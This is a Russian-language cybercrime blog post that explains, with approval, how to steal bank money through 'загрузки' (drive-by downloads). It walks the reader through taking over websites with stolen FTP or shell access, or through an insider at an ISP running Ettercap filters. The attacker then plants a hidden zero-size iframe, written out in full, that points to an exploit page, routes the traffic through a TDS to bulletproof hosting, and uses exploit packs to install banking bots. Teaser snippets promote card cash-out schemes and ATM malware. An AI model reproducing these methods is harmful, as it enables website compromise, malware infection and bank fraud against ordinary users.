Skip to main content

Залив на карту или счёт и зачем нужен iFrame трафик


Трафик - на сленге вебмастеров и поисковых оптимизаторов — количество посетителей, пришедших на веб-сайт или дорвей, он разделяется на страны, или же можно купить себе микс трафф - это смешаный трафик нескольких стран стразу.

Для чего нужен трафик?
В своей основе iFrame трафик дроповоды и реальные заливщики денег на карты и счета используют для загрузок (что такое iFrame я расскажу позже). А что такое загрузки? Ещё трафик можно продавать.

Где взять трафик?
Конечно же трафик можно купить, но для чего? Его можно добыть самому и продавать или использовать для загрузок банковских ботов. Ещё трафик можно брать с ломаных сайтов, дорвеев, спам рассылок...

Чтобы иметь трафик дроповодам нужны FTP или прогуженый шелл различных сайтов, а лучше иметь своё доверенное лицо в Укртелекоме - это самый надёжный вариант.

Для чего мне нужны FTP и Shell и что мне с ними делать?
iFrame - это код HTML внутри страницы. С помощью iFrame дроповод может вставлять один HTML документ в другой! Проще говоря, iFrame - это код, который можно вписать в страницу любого сайта (или в транзитный трафик), чтобы поиметь трафик самому.

Например, мы вставили свой iFrame в главную страницу сайта www.site.ru и при заходе на сайт пользователь будет заходить одновременно на наш сайт, не ведая того!
Вот и сам iFrame код, который нужно вставить в код сайта с которого хотим получать трафик:
<iframe src="http://site.ru/sploit.php" width="0" height="0" frameborder="0"></iframe>
где:
http://site.ru/sploit.php- это сайт на который пользователи site.ru будут заходить одновременно
width="0" длина равна 0
height="0" высота равна 0
frameborder="0" граница фрейма равна 0

Что делать с Iframe?
Берем FTP или Shell какого-либо сайта, заходим в рабочий каталог сайта и редактируем главную страницу, обычно это index.html (php) или же заюзаем фильтры Ettercap NG через своего человека в Укртелекоме, и вставляем наш iFrame, не забываем после этого сохранить страницу.

Что нужно для продажи трафика?
Есть такая штука, как TDS - Traffic Direct System, - это система управления трафиком, в общем, такой небольшой web сайт, с помощью которого распределяется трафик, фильтруется, ведется статистика. Если у тебя возникает вопрос “а зачем оно мне нужно, у меня трафа мало и фильтровать его мне не нужно”, то отвечаю.

Например, ты лил трафф на кодеки, или на партнёрки, а они вдруг взяли и в новостях сегодня написали, что меняют свой домен. Что, будешь менять на всех дорах редирект?.. а когда они опять сменят домен, опять перелопачивать доры? Лучше в таком случае перенаправить весь трафф на Simple TDS, а от-туда уже лить трафф на партнерку. Или тебе захочется попробовать лить трафф на другую партнёрку, или даже просто на другой фид уже существующей.

В общем, если начинаете задумываться о бизе на трафике, то об установке Simple TDS следует позаботится в первую очередь. Сильно углубляться про TDS я не буду, но хочу дать не большой совет по поводу хостинга на который вы будете лить свой трафик. Покупайте лишь абузоустойчивый хостинг, потому что админы сайтов могут заподозрить не ладное и найти ваш iFrame и будут жаловаться вашему хостеру, поэтому лучше сразу покупать абузный хостинг.
Ну вот и всё, теперь поговорим про загрузки.

Что же такое эти загрузки?
Загрузки - это загрузка и запуск файла на компьютере клиента банка или простого лоха, - один из самых распространённых методов распространения банковских ботов в Интернет.



Загрузки можно делать с помощью ботнета и связки сплоитов. Поговорим про использование связки сплоитов...

Загрузки - это очень денежное дело, больше всего ценятся загрузки следующих стран: AU, UK, IT, NZ, ES, US.

Что нам нужно для того чтобы делать загрузки?
Нам нужен трафик, связка сплоитов и абузоустойчивый хостинг.

Допустим что у нас есть 5.000 трафика, это не означает что это у нас будет 5.000 загрузок, количество загрузок зависит от пробива используемой нами связки, если пробив у связки 20% значит у нас будет 1.000 загрузок.

Теперь про связку сплоитов
Exploit - это скрипт, который позволит нам выполнить действия на машине жертвы, через уязвимость в какой-либо программе (чаще всего в браузере).
А связка сплоитов (exploit-pack) это несколько сплоитов связанных в один скрипт. Причем связка построена так, что при открытии её пользователем она сама определяет версию операционной системы пользователя, версию обозревателя, версию установленной Java-машины и в зависимости от этого сама подбирает наиболее подходящий сплоит для нашего клиента.

Что же такое пробив связки?
Пробив - это процент загрузок с 1.000 трафика. Пробив зависит не только от связки, но и от качества трафика, то есть сколько длилась сессия и сколько по времени пользователь находился на сайте. Оно и понятно, чем дольше он находился - тем лучше для пробива и прогруза. Лучше всего брать приват связки, с хорошим пробивом, которые не палят антивирусы.

Как делать загрузки?
Думаю, вы уже сами догадались, но для не понятливых объясню. Например, ваша связка находится по адресу www.site/svjzka.php - значит нам надо лить трафик на этот адрес и тогда вы сможете получить всё, что захотите.

Comments

Popular posts from this blog

Как найти заливщика на карту

Своего первого реального заливщика, который показал мне как можно скачать деньги в интернет с банковских счетов, я нашел случайно, когда еще трудился в Укртелекоме сменным инженером немного подрабатывая продавая трафик налево, но потом этот человек отошел от дел в связи со слишком уж скользкой ситуацией в данной сфере, и я решил поискать партнера на форумах, разместив рекламу на трёх электронных досках объявлений. Честно говоря поначалу даже был готов сразу закинуть 500 000 гривен в Гарант, но потом призадумался, а стоит ли?

Ко мне начал обращаться народ обращается разных категорий

1. Дебильная школота, которая что-то любит повтирать про свою серьезность и просит закинуть 10 000 USD им на Вебмани в качестве аванса 
2. Реальные мэны, которые льют сразу большую сумму по SWIFT без разговоров про гарантии и прочую шнягу, но после того, как им отдаёшь нал, они сразу пропадают, суть данных действий я так и не понял. зачем пропадать, если всё прошло гладко? 3. Мутные личности, берущие реквизиты …

Сналить деньги из банкомата можно набором кода

Каспер и его охотники за призраками в доспехах не так давно обнаружили изъян в защите банкоматов, с помощью которого дроповоды могут снимать крупные суммы денег вообще без карты.

Cлужбы безопасности некоторых крупных банков в странах Европы, Латинской Америки и Азии, в которых дроповоды уже пытались воспользоваться выявленным изъяном начали собственное внутреннее расследование.



Специалисты выяснили, что снять в банкомате наличные можно после введения некоторой комбинации цифр на панели, после чего неразводной дроп может за один подход к банкомату получить 40 банкнот. Кредитная или дебетовая карта при этом вообще не требуется.



Перед тем, как снять таким образом наличные, дроповоду требуется прогрузить в банкомат компьютерный вирус с загрузочного компакт-диска, для этого необходим доступ к внутренним компонентам банкомата. Как дроповодам удается получать этот доступ, специалисты банка пока ещё не пояснили.

Взломщик банкоматов "Тюпкин"

После установки троянской программы в банк…

Залив на карту, BitCoin mining или как ещё можно получать живые деньги в сети

В нынешних компьютерах и смартфонах хранятся живые деньги. Ну, пусть не хранятся, но уж доступ-то к ним вполне себе можно поиметь, причём практически за так! 
Как известно, времена идейных хактивистов давно прошли, в отдельно взятых странах наступил капитализм, и пишут вредоносный код теперь почти исключительно на коммерческой основе именно для того, чтобы скачать деньги с телефона или банковского счёта какого-нибудь лоха. Конечно, идейные люди остались, но они скорее поставщики интересных фишек и способов обхода механизмов безопасности операционной системы Windows, а другие, более ушлые люди реализуют эти наработки в своих творениях для заработка онлайн.

Скачать деньги со карты или счёта лоха можно, так сказать, прямо и косвенно. Одни боты для заработка ориентируются на монетизацию аппаратных ресурсов и вычислительных мощностей конечных пользователей. Сюда относятся: организация прокси- и DDoS-атак, рассылка спама, bitcoin-майнинг, накрутка посещений сайтов (black SEO), переход по р…

Black Hat SEO или бот для скликивания контекстной рекламы

На днях мне стало интересно, а каким образом с точки зрения «черных» методов SEO могут быть использованы хакерские программы – например, путем генерации трафика для заинтересованных ресурсов или скликивания контекстной рекламы AdWords или Яндекс.Директ
Понятно, что увеличение числа посетителей на сайте интернет-магазина или компании, занимающейся недвижимостью, вероятнее всего положительно скажется на их доходах. Поэтому разработка подобного типа программ — вполне себе обыденное дело, и появились такие программы уже давно. По большей части таких ботов можно разделить на два класса — это различного рода Adware, которое распространяется вместе с популярными программами, или трояны, которые осуществляют более серьезную модификацию системы.  Win32/Patched.P Давай для начала рассмотрим достаточно экзотический, но от этого не менее интересный способ подмены результатов поиска в популярных поисковых сервисах Яндекс и Google, который был реализован в троянской программе Win32/Patched.P (ESET)…

М9 - Точка обмена трафиком - МОСКОВСКИЙ INTERNET EXCHANGE (MSK-XI)

Вот так всё начиналось
Изначально был всего один провайдер - Релком. Не было конкурентов - не было проблем. Рунет еще делал свои первые шаги, и все русскоязычные ресурсы были сосредоточены в одном месте. Позже Релком развалился на Релком и Демос, стали появляться другие провайдеры. Рунет тем временем подрос и... распался на множество отдельных сетей-сегментов, контролируемых разными провайдерами. Разумеется, конечные пользователи имели доступ ко всем ресурсам рунета, но прямого взаимодействия между провайдерами не было. Поэтому трафик шел с сервера одного провайдера по огромной петле через Америку, потом Германию, и только потом возвращался на сервер другого провайдера. Имела место неоправданная потеря и в скорости, и в деньгах. Пока трафик был незначительным, это мало кого волновало, но интернет бурно развивался, трафик по рунету стремительно увеличивался, и в один прекрасный день крупные провайдеры Москвы (по сути, Демос и Релком) сели друг напротив друга и решили, что им надо налаж…